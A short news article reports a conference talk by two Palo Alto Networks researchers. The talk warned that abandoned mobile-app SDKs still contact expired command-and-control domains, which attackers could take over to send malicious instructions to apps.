Expired domains present an opportunity for malicious activity
Experts said expired domains are often purchased with the intent of advertising, but researchers noted these domains and abandoned SDKs present an opportunity for threat actors to target mobile users.
Zhi Xu and Tongbo Luo, researchers for Palo Alto Networks, described the risks during a talk at the Virus Bulletin International Conference in Denver. According to the Xu and Luo, many third-party app software development kits (SDKs) have been abandoned, but the apps are still available to users. These apps will attempt to contact command and control servers (C&C) at expired domains which could be repurposed for malicious activity.
"Hundreds of these SDK companies were startups existing at one time, but many of these startups died and no one is maintaining this infrastructure. A large part of this infrastructure is unmaintained," Xu said at the conference. "If unmaintained, the apps including these SDKs will try to talk to the master server for instructions and get no response. As domains expire, attackers can take over these domains and infrastructure, and send malicious instructions and content.”
